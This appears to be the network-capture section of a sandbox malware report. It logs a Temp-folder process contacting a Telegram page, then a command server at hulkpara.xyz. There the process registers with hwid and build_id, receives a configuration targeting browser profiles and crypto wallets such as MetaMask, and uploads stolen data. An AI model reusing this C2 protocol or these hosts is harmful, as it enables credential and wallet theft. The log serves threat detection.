                                                                                                                                                                                                                                                                                          • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                          • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                          • https:
                                                                                                                                                                                                                                                                                            • assets.msn.com
                                                                                                                                                                                                                                                                                            • c.msn.com
                                                                                                                                                                                                                                                                                            • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                            • browser.events.data.msn.com
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Dec 19, 2024 08:13:32.954413891 CET | 94.130.191.168 | 443 | 192.168.2.7 | 49717 | CN=hulkpara.xyz CN=E6, O=Let's Encrypt, C=US | CN=E6, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US | Wed Dec 18 13:29:55 CET 2024 Wed Mar 13 01:00:00 CET 2024 | Tue Mar 18 13:29:54 CET 2025 Sat Mar 13 00:59:59 CET 2027 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
CN=E6, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Wed Mar 13 01:00:00 CET 2024 | Sat Mar 13 00:59:59 CET 2027
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49710 | 149.154.167.99 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:17 UTC | 85 | OUT | GET /k04ael HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 07:13:18 UTC | 511 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Thu, 19 Dec 2024 07:13:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12301
Connection: close
Set-Cookie: stel_ssid=e9869b8b87686704e9_6096942602176790318; expires=Fri, 20 Dec 2024 07:13:17 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2024-12-19 07:13:18 UTC | 12301 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49711 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:20 UTC | 232 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: hulkpara.xyz
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 07:13:21 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2024 07:13:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-19 07:13:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49712 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:22 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----TR9Z5XBSR1N7YU3OPPZ5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: hulkpara.xyz
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-19 07:13:22 UTC | 256 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 54 52 39 5a 35 58 42 53 52 31 4e 37 59 55 33 4f 50 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 31 41 34 31 46 32 37 36 31 35 33 32 35 36 34 35 30 37 36 35 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 54 52 39 5a 35 58 42 53 52 31 4e 37 59 55 33 4f 50 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 54 52 39 5a 35 58 42 53 52 31 4e 37 59 55 33 4f 50 50 5a 35 2d 2d 0d
Data Ascii: ------TR9Z5XBSR1N7YU3OPPZ5Content-Disposition: form-data; name="hwid"001A41F276153256450765-a33c7340-61ca------TR9Z5XBSR1N7YU3OPPZ5Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------TR9Z5XBSR1N7YU3OPPZ5--
2024-12-19 07:13:23 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2024 07:13:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-19 07:13:23 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 7c 31 7c 31 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
Data Ascii: 3a1|1|1|1|cf24ca26af1dc229937e6396f212b71d|1|1|1|1|0|50000|10


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          3192.168.2.74971394.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:24 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GVA1VKFU3EKF3E37900Z
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:24 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------GVA1VKFU3EKF3E37900ZContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------GVA1VKFU3EKF3E37900ZContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------GVA1VKFU3EKF3E37900ZCont
2024-12-19 07:13:25 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:25 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
2024-12-19 07:13:25 UTC | 2192 | IN
                                                                                                                                                                                                                                                                                          Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49714 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:27 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----UKFK6PZ58YM7QQ1V3OP8
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2024-12-19 07:13:27 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                          Data Ascii: ------UKFK6PZ58YM7QQ1V3OP8Content-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------UKFK6PZ58YM7QQ1V3OP8Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------UKFK6PZ58YM7QQ1V3OP8Cont
2024-12-19 07:13:28 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:27 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
2024-12-19 07:13:28 UTC | 5837 | IN
                                                                                                                                                                                                                                                                                          Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49715 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:29 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----0R1DBSRQQ9RQIE37Y5F3
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 332
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2024-12-19 07:13:29 UTC | 332 | OUT
                                                                                                                                                                                                                                                                                          Data Ascii: ------0R1DBSRQQ9RQIE37Y5F3Content-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------0R1DBSRQQ9RQIE37Y5F3Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------0R1DBSRQQ9RQIE37Y5F3Cont
2024-12-19 07:13:30 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:30 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
2024-12-19 07:13:30 UTC | 119 | IN
                                                                                                                                                                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49716 | 94.130.191.168 | 443 | 7416 | C:\Users\user\AppData\Local\Temp\325114\Miniature.com
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:31 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----XTJEKXB16P8YU3ECBIWB
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 6365
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2024-12-19 07:13:31 UTC | 6365 | OUT
                                                                                                                                                                                                                                                                                          Data Ascii: ------XTJEKXB16P8YU3ECBIWBContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------XTJEKXB16P8YU3ECBIWBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------XTJEKXB16P8YU3ECBIWBCont
2024-12-19 07:13:32 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:32 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
2024-12-19 07:13:32 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49722 | 172.217.19.228 | 443 | 8060 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:35 UTC | 595 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
2024-12-19 07:13:36 UTC | 1266 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:36 GMT
                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-oI_O0Y18oRWsguAsH1zvAw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
2024-12-19 07:13:36 UTC | 124 | IN | Data Ascii: 349)]}'["",["aries daily horoscope today","helldivers killzone crossover","penn state nebraska volleyball game","soundhou
2024-12-19 07:13:36 UTC | 724 | IN | Data Ascii: nd ai stock","western washington power outages","auburn johni broome injury","anora streaming date","honda nissan merger talks"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2Vhc
2024-12-19 07:13:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49724 | 172.217.19.228 | 443 | 8060 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:35 UTC | 353 | OUT | GET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49725 | 172.217.19.228 | 443 | 8060 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:13:36 UTC | 498 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
2024-12-19 07:13:36 UTC | 1018 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Version: 705503573
                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:36 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
2024-12-19 07:13:36 UTC | 372 | IN | Data Ascii: 14ae)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:36 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                          Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:36 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                          Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
